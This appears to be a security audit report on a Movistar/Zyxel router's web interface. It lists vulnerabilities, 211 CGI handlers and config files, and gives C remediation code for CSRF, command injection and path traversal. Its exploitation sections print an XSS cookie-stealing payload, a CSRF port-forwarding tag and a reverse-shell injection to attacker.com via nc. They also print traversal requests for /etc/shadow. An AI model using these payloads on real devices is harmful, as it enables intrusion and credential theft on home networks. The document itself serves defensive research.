Object Identifier (OID) Structure:
- Format: InternetGatewayDevice.Category.SubCategory.{i}.Parameter
- Example: InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.SSID
OID Access Functions:
- cccRdmGetObjectByOID(oid) - Get single object
- cccRdmGetObjListByOID(oid) - Get object list
- cccRdmSetObjectByOID(oid, value) - Set object value
OID Modules (in libbemodules.so):
- Each OID has:
  - OID_*_Boot - Initialization at boot
  - OID_*_ConfigLoaderFunc - Configuration loader
  - OID_*_ConfigLoaderFunc_Boot - Boot-time config load
Example OIDs Found:
- OID_InternetGatewayDevice_X_5067F0_Ext_LoginPrivilegeMgmt_i_ConfigLoaderFunc
- OID_InternetGatewayDevice_ManagementServer_X_5067F0_CAContent_ConfigLoaderFunc_Boot
- OID_InternetGatewayDevice_Mos_MosUserConfig_ConfigLoaderFunc
| Vulnerability | Severity | CVSS | Exploitability | Impact |
|---|---|---|---|---|
| Old jQuery versions with known XSS | CRITICAL | 8.5 | Easy | Account takeover, session theft |
| No CSRF protection | CRITICAL | 8.1 | Easy | Unauthorized config changes |
| Weak password hash ($p$root) | CRITICAL | 9.1 | Medium | Full device compromise |
| Potential command injection (ping.cgi) | HIGH | 8.8 | Medium | Remote code execution |
| Path traversal (file browsers) | HIGH | 7.5 | Medium | Sensitive file disclosure |
| No HTTPS enforcement | HIGH | 7.4 | Medium | Credential interception |
| Session fixation possible | MEDIUM | 6.5 | Medium | Session hijacking |
| Verbose error messages | MEDIUM | 5.3 | Easy | Information disclosure |
| Debug features in production | MEDIUM | 6.1 | Hard | Potential bypass mechanisms |
| Telnet support | MEDIUM | 6.5 | Medium | Unencrypted access |
Affected Versions:
- jQuery 1.3.2 - CVE-2007-2379, multiple XSS issues
- jQuery 1.6.3 - CVE-2011-4969 (location.hash XSS)
Exploitation:
```html
<!-- Trigger XSS via jQuery selector -->
http://192.168.1.1/page#<img src=x onerror=alert(document.cookie)>
```
Impact:
- Session cookie theft
- Account takeover
- CSRF bypass
- Malicious actions as authenticated user
Remediation:
- Update all jQuery to 3.6.3+
- Remove jQuery 1.x versions
- Implement Content Security Policy (CSP)
Missing Protection:
- No CSRF tokens found in forms
- No SameSite cookie attribute
- No Referer validation
Exploitation:
```html
<!-- Attacker site triggers config change -->
<img src="http://192.168.1.1/cgi-bin/portForwarding_add.cgi?port=22&ip=attacker.com">
```
Impact:
- Unauthorized firewall rule changes
- Port forwarding to attacker
- WiFi password changes
- Admin account creation
Remediation:
- Implement CSRF tokens (per-session random value)
- Validate Referer header
- Use SameSite=Strict cookie attribute
- Require password for sensitive operations
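The per-session token remediation above, worked through as an added example (not code from the device or from Zyxel): a random token is generated at login and stored with the session, every form embeds it as a hidden field, and each state-changing handler refuses the request unless the POST body echoes it back. The field name `csrf_token` and the use of /dev/urandom are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CSRF_HEXLEN 32   /* 16 random bytes, hex encoded */

/* Fills tok (>= CSRF_HEXLEN + 1 bytes) with a random token from /dev/urandom;
 * generated once per login and stored with the session. Returns 1 or 0. */
int csrf_token_new(char *tok)
{
    unsigned char raw[CSRF_HEXLEN / 2];
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return 0;
    size_t got = fread(raw, 1, sizeof raw, f);
    fclose(f);
    if (got != sizeof raw) return 0;
    for (size_t i = 0; i < sizeof raw; i++)
        snprintf(tok + 2 * i, 3, "%02x", raw[i]);
    return 1;
}
/* Constant-time compare: must not leak how much of a guessed token matched. */
static int csrf_equal(const char *a, const char *b)
{
    unsigned char diff = 0;
    if (strlen(a) != CSRF_HEXLEN || strlen(b) != CSRF_HEXLEN) return 0;
    for (int i = 0; i < CSRF_HEXLEN; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}
/* Minimal key=value lookup in an x-www-form-urlencoded body (a hex token
 * needs no percent-decoding). Copies the value into out and returns 1. */
static int form_value(const char *body, const char *key, char *out, size_t len)
{
    size_t klen = strlen(key);
    for (const char *p = body; p && *p; p = strchr(p, '&'), p = p ? p + 1 : NULL) {
        if (strncmp(p, key, klen) != 0 || p[klen] != '=') continue;
        size_t vlen = strcspn(p + klen + 1, "&");
        if (vlen >= len) return 0;
        memcpy(out, p + klen + 1, vlen);
        out[vlen] = '\0';
        return 1;
    }
    return 0;
}
/* Gate for every state-changing handler: the POST body must echo the
 * session's token, which a forged cross-site request cannot read. */
int csrf_request_ok(const char *session_token, const char *post_body)
{
    char submitted[CSRF_HEXLEN + 1];
    if (!session_token || !post_body) return 0;
    if (!form_value(post_body, "csrf_token", submitted, sizeof submitted)) return 0;
    return csrf_equal(session_token, submitted);
}
```

A cross-site `<img>` GET like the one shown above carries no body and therefore no token, so it is rejected before any configuration change.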
Issues:
- Password hash format `$p$root` is non-standard; it may be a simple hash or a placeholder
- No account lockout mechanism confirmed
- No 2FA/MFA support
Exploitation:
- Brute force attack on login
- Dictionary attack
- Credential stuffing
Remediation:
- Use bcrypt/scrypt for password hashing
- Implement account lockout (5 failed attempts)
- Add CAPTCHA after failed attempts
- Support 2FA/TOTP
Vulnerable CGIs (suspected):
- ping.cgi - Likely executes the system `ping` command
- DiagGeneral.cgi - May run diagnostic commands
- mirror.cgi - Port mirroring configuration
Exploitation:
POST /cgi-bin/ping.cgi HTTP/1.1
target=8.8.8.8; cat /etc/passwd
target=8.8.8.8 | nc attacker.com 4444 -e /bin/sh
Remediation:
- Use safe APIs (no shell execution)
- Whitelist input (IP addresses only)
- Escape all shell metacharacters
- Use parameterized execution
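The ping.cgi remediation above as an added example (not the device's own CGI code): the target is accepted only if it parses as an IPv4/IPv6 literal, and ping is started with execv() and an argv array, so no shell ever interprets the request value. The /bin/ping path and the packet-count bound are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 4 or 6 for an IPv4/IPv6 literal, 0 for anything else: hostnames,
 * empty strings and inputs carrying shell metacharacters all fail here. */
int validate_target(const char *target)
{
    unsigned char buf[16];
    if (target == NULL || strlen(target) >= INET6_ADDRSTRLEN)
        return 0;
    if (inet_pton(AF_INET, target, buf) == 1)
        return 4;
    if (inet_pton(AF_INET6, target, buf) == 1)
        return 6;
    return 0;
}

/* Runs ping for a validated target with a bounded packet count. The binary is
 * started with execv() and an argv array, so no shell ever parses the input.
 * Returns ping's exit status, or -1 if the input was rejected or the process
 * could not be started. /bin/ping is an assumed path. */
int run_ping(const char *target, int count)
{
    char count_str[12];
    int status;

    if (validate_target(target) == 0 || count < 1 || count > 10)
        return -1;
    snprintf(count_str, sizeof count_str, "%d", count);
    char *const argv[] = { "/bin/ping", "-c", count_str, (char *)target, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);                     /* exec failed: ping not present */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```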
Vulnerable CGIs:
- fileSharing_browse.cgi - File browser
- viewlog.cgi - Log viewer
- backupRestore.cgi - Config file access
Exploitation:
GET /cgi-bin/viewlog.cgi?file=../../../etc/shadow HTTP/1.1
GET /cgi-bin/fileSharing_browse.cgi?path=../../../../etc/passwd HTTP/1.1
Remediation:
- Validate file paths against whitelist
- Use chroot for file operations
- Canonicalize paths (realpath())
- Deny `..` in all file parameters
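The path remediation above as an added example (not code from the device): the requested name is rejected if it is absolute or contains a `..` component, then joined to the allowed base directory and canonicalized with realpath(), and the result is accepted only if it still lies under that base, which also catches symlinks pointing outside it. The base directory used in the checks is an assumption.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns 1 if any '/'-separated component of p is exactly "..". Checking
 * components (not substrings) keeps legitimate names like "..cache" usable. */
int has_dotdot(const char *p)
{
    while (*p) {
        size_t n = strcspn(p, "/");
        if (n == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        p += n;
        if (*p == '/')
            p++;
    }
    return 0;
}

/* Resolves a user-supplied name under base and writes the canonical path to
 * resolved. Returns 1 only when the file exists and lies inside base; absolute
 * paths, ".." components, symlink escapes and missing files all return 0. */
int safe_file_path(const char *base, const char *requested,
                   char *resolved, size_t len)
{
    char canon_base[PATH_MAX], joined[PATH_MAX], canon[PATH_MAX];
    size_t blen;
    if (!base || !requested || !resolved || requested[0] == '\0')
        return 0;
    if (requested[0] == '/' || has_dotdot(requested))
        return 0;                        /* cheap rejects first */
    if (!realpath(base, canon_base))
        return 0;
    if (snprintf(joined, sizeof joined, "%s/%s", canon_base, requested)
            >= (int)sizeof joined)
        return 0;                        /* too long */
    if (!realpath(joined, canon))        /* canonicalizes and follows symlinks */
        return 0;
    blen = strlen(canon_base);           /* canon must be base or base/... */
    if (strncmp(canon, canon_base, blen) != 0 ||
        (canon[blen] != '\0' && canon[blen] != '/'))
        return 0;
    if (strlen(canon) >= len)
        return 0;
    memcpy(resolved, canon, strlen(canon) + 1);
    return 1;
}
```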
/usr/shared/web/html/config.json:
{
"CONFIG": {
"Implementation": "api",
"DefaultLanguage": "pt",
"Branding": "movistar",
"Country": "ES",
"LANGUAGES": [
{"file": "language.en.json", "shortName": "en"},
{"file": "language.pt.json", "shortName": "pt"}
],
"SessionMaxTime": 600,
"SessionWarning": false,
"UpdateStep": 10,
"VENDORCONFIGURATION": {
"Availability": true,
"Link": "http://192.168.1.1/main.html"
},
"LanConfEnabled": true,
"Supported3G": true,
"ManualPPPoE": true
}
}
Key Settings:
- Session timeout: 600 seconds (10 minutes)
- Default language: Portuguese
- Branding: Movistar (Telefonica)
- 3G support: Enabled
- Manual PPPoE: Enabled
Runtime generated at:
- /etc/mini_httpd1.conf
- /etc/mini_httpd2.conf
- /etc/mini_httpd3.conf
- /etc/mini_httpd4.conf
Expected Configuration:
port=80
ssl_port=443
ssl_cert=/etc/mycert/web.pem
chroot=/usr/shared/web
user=nobody
cgipat=/cgi-bin/*
pidfile=/tmp/mini_httpd1.pid
logfile=/tmp/mini_httpd1.log
/etc/config/rpcd:
config rpcd
option socket /var/run/ubus/ubus.sock
option timeout 30
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
- Update jQuery Libraries
  - Remove jQuery 1.x versions
  - Use only jQuery 3.6.3
  - Test all JavaScript functionality
- Implement CSRF Protection
  - Generate random token per session
  - Include in all forms as hidden field
  - Validate token on all state-changing requests
- Strengthen Authentication
  - Replace `$p$root` with proper bcrypt hash
  - Implement account lockout (5 attempts)
  - Force password change on first login
- Enforce HTTPS
  - Redirect HTTP → HTTPS automatically
  - Set HSTS header
  - Use secure cookies only
- Input Validation Audit
  - Review all 211 CGI binaries
  - Implement whitelist validation
  - Add length limits
- Add Security Headers
  - Content-Security-Policy: default-src 'self'
  - X-Frame-Options: DENY
  - X-Content-Type-Options: nosniff
  - Strict-Transport-Security: max-age=31536000
- Session Security
  - Add SameSite=Strict to cookies
  - Bind sessions to IP addresses (already done)
  - Regenerate SessionKey on privilege escalation
- Disable Unnecessary Services
  - Disable Telnet (use SSH only)
  - Disable debug endpoints
  - Remove HTTP server instances 2-4 if unused
- Code Audit
  - Static analysis of all CGI binaries
  - Penetration testing
  - Fuzzing file upload handlers
- Architecture Improvements
  - Migrate to modern web framework (React/Vue + REST API)
  - Separate frontend from backend
  - Use JSON API instead of CGI
- Monitoring & Logging
  - Log all authentication attempts
  - Alert on failed login patterns
  - SIEM integration
- Regular Updates
  - Automated dependency scanning
  - Security patch pipeline
  - CVE monitoring
- login_advance.cgi
- logout_advance.cgi
- passLogout.cgi
- doregister.cgi
- clear_first_access.asp
- indexmain.cgi
- menuJson.cgi
- naviView_partialLoad.cgi
- info.cgi
- current.cgi
- statusview.cgi
- networkMap.cgi
- broadband.cgi
- connection_icon_list.cgi
- connection_table_list.cgi
- connectionStatus_p1.cgi
- wanRemoteNode_ETH_Edit.cgi
- wanRemoteNode_GPON_Edit.cgi
- lanSetup.cgi
- ipv6LanSetup.cgi
- dhcp_static_list.cgi
- staticDHCP_add.cgi
- staticDHCP.cgi
- ipalias.cgi
- wlan_general.cgi
- wlan_MACAuthentication.cgi
- wlan_macfilter_add.cgi
- wlan_macfilter_edit.cgi
- wlan_mac_address_list.cgi (+ 1,2,3 variants)
- wlan_moreAP.cgi
- wlan_moreap_edit.cgi
- wlan_others.cgi
- wlan_wps.cgi
- wlan_wpsinfo.cgi
- wlan_WpsStatus.cgi
- wlan_WPStimerRunning.cgi
- wlan_staionInfo.cgi
- wlan_staionInfo_list.cgi (+ 1,2,3 variants)
- moreApStatus.cgi
- wlan5_* (mirrors all 2.4GHz CGIs)
- wlan_scheduling.cgi
- wlan_schedule_add/edit/delete.cgi
- EasyMesh.cgi
- qos_general.cgi
- qos_class.cgi
- qos_queue.cgi
- qos_shaper.cgi
- qos_class_add.cgi
- queue_add.cgi
- shaper_add.cgi
- NAT_General.cgi
- NAT_AddrMapping.cgi
- nat.cgi
- portForwarding.cgi (+ add/edit/list/delete variants)
- portTriggering.cgi (+ add/edit/list variants)
- dmz.cgi
- addrMap_add.cgi
- static.cgi (+ add/list variants)
- ipv6static.cgi (+ add/list variants)
- dns_routing.cgi (+ add/list variants)
- gretunnel.cgi (+ add/list variants)
- ipTunnel.cgi
- dynamicDNS_InadynV2.cgi
- dynamicDNS_InterfaceIndex.cgi
- upnp.cgi
- current_upnp_table.cgi
- TELFirewall_*.cgi (13 variants)
- TR181Firewall.cgi (+ RuleEdit variant)
- IP_MAC_Filter.cgi
- ipMacFilterList.cgi
- URL_Filter.cgi (+ Edit/list/delete variants)
- Keyword_Filter_list.cgi
- ParentalControl.cgi
- ParentalControladd.cgi
- ParentalControl_view.cgi
- localCA.cgi (+ frame variant)
- trustedCA.cgi (+ add/view variants)
- sshCA_list.cgi
- sipServiceProvider.cgi (+ setting/list variants)
- sipAccount.cgi (+ setting/list variants)
- SIP_ALG.cgi
- phone.cgi
- callRule.cgi (+ CO variant)
- VoIPStatus.cgi (+ list variant)
- traffic_wan/lan/nat.cgi (+ frame variants)
- viewlog.cgi
- ViewSyslog.cgi
- RemMag*.cgi (General, WWW, WWW4Airtel, SNMP, DNS, ICMP, SSH, TELNET)
- backupRestore.cgi
- reboot.cgi (+ info variant)
- system.cgi
- time.cgi
- DiagGeneral.cgi
- ping.cgi
- mirror.cgi
- logSet.cgi
- zlog.cgi
- firewareUpgrade.cgi
- Fireware_UpgradesManaged.cgi
- tr69cfg.cgi
- tr369.cgi
- agentMTP.cgi (+ list variant)
- controller.cgi (+ list variant)
- stompConn.cgi (+ list variant)
- mqttClient.cgi (+ list variant)
- fileSharing.cgi (+ add/mod/del/list/browse variants)
- fileuser_*.cgi (add/mod/del/list variants)
- printServer.cgi
- userAccount.cgi
- PCP_ClientListIndex.cgi (+ view variant)
- PCP_list.cgi
- pcplist.cgi
- gponPassword.cgi
- vd.cgi
- vdview.cgi
- tabFW.cgi
- delete.cgi
- delete_RuleSum.cgi
- autofw_notify.asp (+ check variant)
- schedule_list.cgi
Total: 211 CGI binaries
InternetGatewayDevice.
├── DeviceInfo.
│ ├── ManufacturerOUI
│ ├── SerialNumber
│ └── SoftwareVersion
├── Layer3Forwarding.
│ └── Forwarding.{i}
├── LANDevice.{i}.
│ ├── WLANConfiguration.{i}.
│ │ ├── SSID
│ │ ├── BeaconType
│ │ └── ...
│ └── X_5067F0_IPv6LANHostConfigManagement.
├── WANDevice.{i}.
│ ├── WANConnectionDevice.{i}.
│ └── ...
├── X_5067F0_Ext.
│ ├── LoginPrivilegeMgmt.{i}
│ ├── Print
│ ├── FTP
│ └── ...
├── ManagementServer.
│ └── X_5067F0_CAContent
├── Mos.
│ └── MosUserConfig.
├── QoS.
├── Time.
├── IGMP.
└── ...
Note: X_5067F0_ prefix indicates vendor-specific extensions (5067F0 = Zyxel vendor code in hex)
Document Version: 2.0
Last Updated: 2025-10-06
Total Pages Documented: 38 page categories
Total CGI Handlers: 211
Vulnerabilities Identified: 10 major issues
Classification: Security Research - Confidential